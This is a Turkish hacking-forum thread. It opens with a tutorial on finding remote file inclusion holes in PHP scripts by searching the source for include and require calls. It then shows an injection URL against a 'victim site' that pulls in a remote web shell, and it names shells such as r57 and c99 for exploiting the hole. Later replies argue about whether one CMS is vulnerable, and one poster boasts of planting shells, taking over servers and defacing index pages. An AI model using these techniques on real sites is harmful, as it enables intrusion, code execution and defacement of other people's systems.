standart rfi açıkları bulma yöntemleri

--------------------------------------------------------------------------------

RFI açılımı olarak Remote File Inclusion'dur yani türkçe karşılığı olarak Uzaktan Dosya Enjekte etmektir ama biz buna hacking aleminde daha çok Uzaktan Kod Çağırma diyoruz..

Mantığına gelince de;

PHP Coderların sayfaları kodlarken kullandıkları string (yumak) ve variable (değişken) lerin tam olarak kontrol edilmemesinden dolayı her zaman war olan ve war olmaya devam edecek olan bir güvenlik açığıdır. Neden böyle söyleyebiliyorum? Çünkü 2-3 gün boyunca bir an bile durmaksızın kodlama yapan bir coder elinde sonunda bir yerde gerek yorgunluktan gerekse dikkatsizlikten dolayı kodlarda açık werecektir. Neyse lafı fazla dolandırmadan örnek vereyim..

Hepimizin bildiği ve bu sitede de kullanılan vBulletin script'ini ele alalım. ( artı parantez vBulletin'in popüler versiyonları olan 3.6.x serisinde bugune kadar rfi açığı bulunduğunu duymadım bilmiyorum. Sadece örnek olsun diye bu scripti ele aldım. )

Nası bulunur? Kullanımı nası olur?

Açık tespit etmek için öncelikle PHP den orta seviye de anlamamız gerekiyor. şimdi adım adım açık bulmayı anlatayım..

Öncelikle açık bulmak istediğiniz scriptin kaynak kodlarını bilgisayarınıza download ediyorsunuz. Bu örnekte biz vBulletin scriptini indiriyoruz. ve araştırmaya başlıyoruz. Mesela " index.php " dosyasını araştırmak istiyoruz..

O zaman index.php dosyasını bir text editörü yardımı ile açıyoruz örnğin Not Defteri.. ve hemen kodları incelemeye başlıyoruz..

Araştırma kriterlerimiz;

include
include_once
require
require_once

fonksiyonlarıdır. Hatta bir iyilik daha yapayım ve bu fonksiyonların PHP ne işe yaradığını anlatayım.. Daha etkili olur..

Şimdi bildiğiniz üzere web-sitelerinde dolaştığınız her sayfa tek tek sıfırdan yapılır.. Özellikle HTML site kodlandığı zaman her sayfa için aynı kodları tekrar tekrar girmek zorunda kalırsınız ama PHP bu yönüyle ve diğer yönleriylede HTML den oldukça üstündür ve include ve require fonksiyonları sayesinde sabit bir sayfayı farklı amaçlarda kullanabiliriz. yani anlatmak istediğim şey mesela bir inşaat şirketinin sitesini PHP olarak kodluyosunuz ve header dediğimiz yukarıda yani banner ve çevresini kapsayan kısım anasayfadan tutunda kontak sayfasına kadar heryerde aynı değişen tek şey sadece ortada bulunan yazıların bulundugu yer.. Şimdi anasayfa ve kontak sayfası için tek tek kodlama yapmaktansa ust.php diye bir kere kodlarız ve anasayfa.php ye aşağıdaki kodu ekleriz;

<?
include_once ($orchid, "ust.php")
?>

daha sonra ayasayfa.php dosyasını çalıştırdığımız zaman ust.php nin anasayfa ile bütünleşerek çıktığını görürsünüz ve bu kodu her sayfanız için yazarsanız otomatikmen kolay bi şekilde ust.php dosyasını istediğiniz yere ENJEKTE edebilirsiniz.. " Dikkat : ENJEKTE " Şimdi include ve require fonksiyonlarının mantığını anladığınızı varsa***** kaldığımız yere geri dönelim..

index.php dosyasını açtınız ve include, include_once, vb. gibi bir kod gördünüz..

Az önceki örneğe devam edelim;

<?
include_once ($orchid, "ust.php")
?>

Yukarıda gördüğünüz PHP kodu bulundugu sayfaya aynı dizinde bulundugu ust.php dosyasını çağırmaktadır. (Dikkat : ÇAĞIRMAKTADIR ) Şimdi biz ne yapabiliriz bu koda? Hemen düşünürüzki acaba coder " DOSYA ÇAĞIRMA " işlevini sınırlandırmışmıdır yani sadece bulunduğu dizinden mi dosya kabul ediyor?? Hemen bi deneme yaparız.;

index.php dosyasındaydık ve " orchid " parametresini kullanarak ust.php dosyasını çağıran yukarıda ki kodda açık arıyoduk, deneme - yanılma yapalım..

kurbansite.com/index.php?orchid=http://SHELL?

Ve girdik.. Şimdi az önce UST.PHP nin bulundugu yerde bizim shellimiz war.. Böylece ilk adımı attık ve açığımızı bulduk bundan sonra artık r57, c99, fatalshell, ekin0xshell ne kullanırsanız kullanıp bulduğunuz açığı sömürün (exploit = Sömürmek)

alıntı...

Açık oldugunu nereden anladın.? neler yapabiliyorlar açıkla daha aydınlatıcı anlatırsan ona göre gerekli düzenlemeyi yaparız.

HP Coderların sayfaları kodlarken kullandıkları string (yumak) ve variable (değişken) lerin tam olarak kontrol edilmemesinden dolayı her zaman war olan ve war olmaya devam edecek olan bir güvenlik açığıdır. Neden böyle söyleyebiliyorum? Çünkü 2-3 gün boyunca bir an bile durmaksızın kodlama yapan bir coder elinde sonunda bir yerde gerek yorgunluktan gerekse dikkatsizlikten dolayı kodlarda açık werecektir.
Bende bu konuyu incelerken fark ettim ki yeni hazırladıgım sistemde çok büyük bir açık bırakmışım son anda fark ettim ve gerekli uygulamayı yaptım yoksa hepimiz yanmıştık fark etselerdi

rfi olmasi imkansiz seditio da ancak sonradan eklenen bir pluginde varsa vardır ;)

Alıntı

---

#4615 rootinq :
rfi olmasi imkansiz seditio da ancak sonradan eklenen bir pluginde varsa vardır ;)

---

Niye imkansız olsun ki ? Daha önce bir çok rfi açığı ile ruslar terör estirdi Kaan Haklı, Herşey Kontrolsüzlükten meydana geliyor, Bunun için ya kurduğun sistemi test edeceksin, yada Allah'a emanet edip bırakacaksın :P ))

aga sorununu anladım ben sorunu çözmek için config.php yi şifrele

oke ozaman config.php yi nası şifreleniyo onu gösterirmisin

gerek yok artık 151 kullanıcam

Alıntı

---

#4645 rootinq :
ben 121 kulaniyorum . ama tum degiskenleri ve eklentileri editlenmis. size tavsiyem bodozlama bi scripti kurmayin madem bu islerle ugrasiyorsunuz biraz terletin kendinizide kendine gore duzenleyn scrpti

---

Scripti değiştirmen senin zararına gerekli güncellemeleri yapmakda zorluk çekersin.
Seditioda açık yok şuan için belki vardır bizim bilmediğimiz ama uzun zamandır önemli bir açığa rastlanmadı.
Madem o işlerle uğrasıyorsunuz indirin test edin Scripti işde burada açık var diye bagırmanın bir anlamı yok Scripti defalarca test edin bir açık bulursanız söyleyin herkes bilsin.

config.php yi şifrelicek ve shellde soksa hacklenmicek ilginç reco
ben şahsen bi sisteme shell soktugumda eger yazma izinleri yoksa (ki her türlü serverı geçerim **** ) Serverı Geçmeye Çalışırım Ve Geçer İndex.php ye indexsi ****
yani shell sokupta aman şunun config.php sini alıyımda sitede admin üyeligine girimde meta atayım demem.